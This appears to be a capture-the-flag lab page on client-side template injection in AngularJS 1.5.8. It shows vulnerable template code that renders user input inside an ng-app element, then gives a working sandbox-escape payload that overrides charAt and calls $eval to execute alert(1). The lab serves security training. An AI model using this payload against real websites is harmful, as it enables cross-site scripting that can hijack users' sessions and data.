Level 6: CSTI (AngularJS)
MISSION: Break out of the Angular 1.5.8 expression sandbox to execute arbitrary JS.
Authentication recognized for user: Guest
System status: {{ 'Online' }}
/// SOURCE CODE INSPECTOR ///
<!-- The page imports an old, vulnerable version of Angular -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.5.8/angular.min.js"></script>
<!-- The ng-app directive is placed on a div containing user input -->
<div class="box" ng-app>
<p>Authentication recognized for user: <strong><%= user_payload %></strong></p>
<p>System status: {{ 'Online' }}</p>
</div>/// DECRYPTION COMPLETE ///
Because the vulnerable div uses the ng-app directive, AngularJS parses anything inside double curly braces {{ }}. To achieve XSS in Angular 1.5.8, we must use a sandbox escape payload that walks up the prototype chain to access the raw JavaScript execution environment.
Payload:
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join; $eval('x=alert(1)');}}